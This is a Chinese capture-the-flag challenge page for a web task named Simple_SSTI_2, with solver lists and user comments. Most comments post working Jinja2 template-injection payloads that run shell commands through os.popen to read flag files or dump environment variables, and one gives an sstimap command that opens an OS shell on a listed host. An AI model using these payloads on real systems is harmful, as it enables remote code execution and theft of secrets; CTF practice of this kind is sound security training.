Simple_SSTI_2WEB 未解决
分数:
10
金币:
3
题目作者:
valecalida
一 血:
Tokeii
一血奖励:
3金币
解 决:
16499
提 示:
描 述:
Simple_SSTI_2
评分(15)
解题动态
ctf菜鸟 攻破了该题 1天前
粉红色的-毛 攻破了该题 1天前
fu11dreamer 攻破了该题 2天前
lj 攻破了该题 3天前
shengood 攻破了该题 5天前
ndzdb 攻破了该题 5天前
fish12138 攻破了该题 8天前
xxhacker 攻破了该题 9天前
xuyuyan999 攻破了该题 9天前
hauss 攻破了该题 9天前
dlgz 攻破了该题 10天前
Xxx6 攻破了该题 10天前
一只小羊 攻破了该题 11天前
kuku1024 攻破了该题 11天前
echk 攻破了该题 11天前
mybugku26 攻破了该题 12天前
orr_ 攻破了该题 12天前
simple9527 攻破了该题 12天前
蟹不揉 攻破了该题 13天前
评论
bugku2026 1月前
举报
先通过?flag={{self.__dict__}}发现拥有lipsum,再通过?flag={{lipsum.__globals__.os.popen("cat /app/flag").read()}}获取flag
r1ng_13 1月前
举报
焚靖直接秒,比上一个SSTI还简单
网恋秀牛子被录屏导致自卑 4月前
举报
/?flag={{(OvO.__eq__.__globals__.sys.modules.os.popen('cat flag')).read()}}
liutong27 8月前
举报
python3 sstimap.py -u http://117.72.52.127:12369/?flag=1 --os-shell
wywitkey 11月前
举报
前面说的都对,这道题在ssti里比较简单,推荐使用sstimap,可以一把梭,直接出os-shell
HK1ng 1年前
举报
详解:https://blog.csdn.net/m0_59527104/article/details/147013776
smtall 1年前
举报
flag={{ self.__init__.__globals__.__builtins__.__import__('os').popen('cat flag').read() }}
hao7 1年前
举报
?flag={%for(x)in().__class__.__base__.__subclasses__()%}{%if'war'in(x).__name__ %}{{x()._module.__builtins__['__import__']('os').popen('cat flag').read()}}{%endif%}{%endfor%}
超爱西西鸭 1年前
举报
/?flag={{config.__class__.__init__.__globals__[%27os%27].popen(%27cat%20../app/flag%27).read()}}
pettter 1年前
举报
?id={{config.__class__.__init__.__globals__['os'].popen('printenv').read()}}